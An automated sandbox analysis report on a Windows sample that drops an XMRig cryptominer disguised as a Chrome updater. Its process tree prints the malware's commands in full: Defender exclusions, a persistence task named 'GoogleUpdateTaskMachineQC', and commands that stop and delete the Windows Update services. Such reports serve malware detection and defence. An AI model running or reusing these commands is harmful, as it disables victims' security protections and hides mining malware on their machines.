Resubmissions
05-04-2023 16:34
230405-t3e6saaa8v 1031-03-2023 15:09
230331-sjvxfscc5v 1031-03-2023 13:39
230331-qx416sba8z 1030-03-2023 21:18
230330-z5tpvafg2x 1030-03-2023 21:03
230330-zv6awsff8s 1030-03-2023 18:59
230330-xncnwsfd2y 1030-03-2023 17:02
230330-vj468sde36 1030-03-2023 13:33
230330-qtnvsach28 1030-03-2023 06:37
230330-hdjl5abc45 1029-03-2023 21:31
230329-1c2enaaa35 10Analysis
-
max time kernel
1682s -
max time network
1798s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
30-03-2023 06:37
Static task
static1
Behavioral task
behavioral1
Sample
testing.exe
Resource
win7-20230220-en
General
-
Target
testing.exe
-
Size
2.1MB
-
MD5
a12bc9557ad889a49e7b4f970c78dda8
-
SHA1
5383b8e6d09d41384281b95f9ccc8e050e7c04fa
-
SHA256
9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0
-
SHA512
be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee
-
SSDEEP
24576:MHOygNfXDgkB9Y+AVIGckFdi3MUxbw+0AX4xVILyqe7keglf9BHHpRNt05sJNuI6:MuhBSda2+0+4xKLyqewBnfNwsJNO
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
testing.exeupdater.execonhost.exedescription pid process target process PID 912 created 1252 912 testing.exe Explorer.EXE PID 912 created 1252 912 testing.exe Explorer.EXE PID 912 created 1252 912 testing.exe Explorer.EXE PID 912 created 1252 912 testing.exe Explorer.EXE PID 912 created 1252 912 testing.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE PID 324 created 1252 324 conhost.exe Explorer.EXE PID 1668 created 1252 1668 updater.exe Explorer.EXE -
XMRig Miner payload 33 IoCs
Processes:
resource yara_rule behavioral1/memory/1992-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-135-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1104-137-0x0000000140000000-0x00000001405E8000-memory.dmp xmrig behavioral1/memory/1104-138-0x0000000140000000-0x00000001405E8000-memory.dmp xmrig behavioral1/memory/1992-139-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-141-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-145-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-147-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-149-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-151-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-153-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-155-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-157-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-159-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-161-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-163-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-165-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-167-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-169-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1992-171-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
testing.exeupdater.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts testing.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1668 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1096 taskeng.exe -
Processes:
resource yara_rule behavioral1/memory/1992-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-135-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-139-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-141-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-145-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-147-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-149-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-151-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-153-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-155-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-157-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-159-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-161-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-163-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-165-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-167-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-169-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1992-171-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1668 set thread context of 324 1668 updater.exe conhost.exe PID 1668 set thread context of 1992 1668 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.exetesting.exeupdater.execmd.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe testing.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1140 sc.exe 840 sc.exe 1012 sc.exe 1640 sc.exe 316 sc.exe 1396 sc.exe 1996 sc.exe 864 sc.exe 1512 sc.exe 304 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1972 schtasks.exe 1360 schtasks.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0a03df5e262d901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
testing.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exetaskmgr.exepid process 912 testing.exe 912 testing.exe 1528 powershell.exe 912 testing.exe 912 testing.exe 912 testing.exe 912 testing.exe 912 testing.exe 912 testing.exe 960 powershell.exe 912 testing.exe 912 testing.exe 812 powershell.exe 1668 updater.exe 1668 updater.exe 1212 powershell.exe 1668 updater.exe 1668 updater.exe 1668 updater.exe 1668 updater.exe 1668 updater.exe 1668 updater.exe 908 powershell.exe 1668 updater.exe 1668 updater.exe 1668 updater.exe 1668 updater.exe 324 conhost.exe 324 conhost.exe 1668 updater.exe 1668 updater.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 1104 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeupdater.exeWMIC.execonhost.exe7zFM.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 1528 powershell.exe Token: SeShutdownPrivilege 1844 powercfg.exe Token: SeShutdownPrivilege 1396 powercfg.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeShutdownPrivilege 940 powercfg.exe Token: SeShutdownPrivilege 916 powercfg.exe Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeShutdownPrivilege 872 powercfg.exe Token: SeShutdownPrivilege 864 powercfg.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeShutdownPrivilege 1104 powercfg.exe Token: SeShutdownPrivilege 976 powercfg.exe Token: SeDebugPrivilege 1668 updater.exe Token: SeAssignPrimaryTokenPrivilege 1776 WMIC.exe Token: SeIncreaseQuotaPrivilege 1776 WMIC.exe Token: SeSecurityPrivilege 1776 WMIC.exe Token: SeTakeOwnershipPrivilege 1776 WMIC.exe Token: SeLoadDriverPrivilege 1776 WMIC.exe Token: SeSystemtimePrivilege 1776 WMIC.exe Token: SeBackupPrivilege 1776 WMIC.exe Token: SeRestorePrivilege 1776 WMIC.exe Token: SeShutdownPrivilege 1776 WMIC.exe Token: SeSystemEnvironmentPrivilege 1776 WMIC.exe Token: SeUndockPrivilege 1776 WMIC.exe Token: SeManageVolumePrivilege 1776 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1776 WMIC.exe Token: SeIncreaseQuotaPrivilege 1776 WMIC.exe Token: SeSecurityPrivilege 1776 WMIC.exe Token: SeTakeOwnershipPrivilege 1776 WMIC.exe Token: SeLoadDriverPrivilege 1776 WMIC.exe Token: SeSystemtimePrivilege 1776 WMIC.exe Token: SeBackupPrivilege 1776 WMIC.exe Token: SeRestorePrivilege 1776 WMIC.exe Token: SeShutdownPrivilege 1776 WMIC.exe Token: SeSystemEnvironmentPrivilege 1776 WMIC.exe Token: SeUndockPrivilege 1776 WMIC.exe Token: SeManageVolumePrivilege 1776 WMIC.exe Token: SeLockMemoryPrivilege 1992 conhost.exe Token: SeRestorePrivilege 1828 7zFM.exe Token: 35 1828 7zFM.exe Token: SeDebugPrivilege 1104 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exetaskmgr.exepid process 1828 7zFM.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exepowershell.exepowershell.exetaskeng.execmd.exepowershell.exedescription pid process target process PID 1160 wrote to memory of 864 1160 cmd.exe sc.exe PID 1160 wrote to memory of 864 1160 cmd.exe sc.exe PID 1160 wrote to memory of 864 1160 cmd.exe sc.exe PID 520 wrote to memory of 1844 520 cmd.exe powercfg.exe PID 520 wrote to memory of 1844 520 cmd.exe powercfg.exe PID 520 wrote to memory of 1844 520 cmd.exe powercfg.exe PID 1160 wrote to memory of 1640 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1640 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1640 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1512 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1512 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1512 1160 cmd.exe sc.exe PID 520 wrote to memory of 1396 520 cmd.exe powercfg.exe PID 520 wrote to memory of 1396 520 cmd.exe powercfg.exe PID 520 wrote to memory of 1396 520 cmd.exe powercfg.exe PID 1160 wrote to memory of 304 1160 cmd.exe sc.exe PID 1160 wrote to memory of 304 1160 cmd.exe sc.exe PID 1160 wrote to memory of 304 1160 cmd.exe sc.exe PID 520 wrote to memory of 940 520 cmd.exe powercfg.exe PID 520 wrote to memory of 940 520 cmd.exe powercfg.exe PID 520 wrote to memory of 940 520 cmd.exe powercfg.exe PID 1160 wrote to memory of 316 1160 cmd.exe sc.exe PID 1160 wrote to memory of 316 1160 cmd.exe sc.exe PID 1160 wrote to memory of 316 1160 cmd.exe sc.exe PID 520 wrote to memory of 916 520 cmd.exe powercfg.exe PID 520 wrote to memory of 916 520 cmd.exe powercfg.exe PID 520 wrote to memory of 916 520 cmd.exe powercfg.exe PID 1160 wrote to memory of 1696 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1696 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1696 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1928 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1928 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1928 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1140 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1140 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1140 1160 cmd.exe reg.exe PID 1160 wrote to memory of 540 1160 cmd.exe reg.exe PID 1160 wrote to memory of 540 1160 cmd.exe reg.exe PID 1160 wrote to memory of 540 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1880 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1880 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1880 1160 cmd.exe reg.exe PID 960 wrote to memory of 1972 960 powershell.exe schtasks.exe PID 960 wrote to memory of 1972 960 powershell.exe schtasks.exe PID 960 wrote to memory of 1972 960 powershell.exe schtasks.exe PID 812 wrote to memory of 1812 812 powershell.exe schtasks.exe PID 812 wrote to memory of 1812 812 powershell.exe schtasks.exe PID 812 wrote to memory of 1812 812 powershell.exe schtasks.exe PID 1096 wrote to memory of 1668 1096 taskeng.exe updater.exe PID 1096 wrote to memory of 1668 1096 taskeng.exe updater.exe PID 1096 wrote to memory of 1668 1096 taskeng.exe updater.exe PID 676 wrote to memory of 872 676 cmd.exe powercfg.exe PID 676 wrote to memory of 872 676 cmd.exe powercfg.exe PID 676 wrote to memory of 872 676 cmd.exe powercfg.exe PID 676 wrote to memory of 864 676 cmd.exe powercfg.exe PID 676 wrote to memory of 864 676 cmd.exe powercfg.exe PID 676 wrote to memory of 864 676 cmd.exe powercfg.exe PID 676 wrote to memory of 1104 676 cmd.exe powercfg.exe PID 676 wrote to memory of 1104 676 cmd.exe powercfg.exe PID 676 wrote to memory of 1104 676 cmd.exe powercfg.exe PID 676 wrote to memory of 976 676 cmd.exe powercfg.exe PID 676 wrote to memory of 976 676 cmd.exe powercfg.exe PID 676 wrote to memory of 976 676 cmd.exe powercfg.exe PID 908 wrote to memory of 1360 908 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\testing.exe"C:\Users\Admin\AppData\Local\Temp\testing.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mibqiuc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
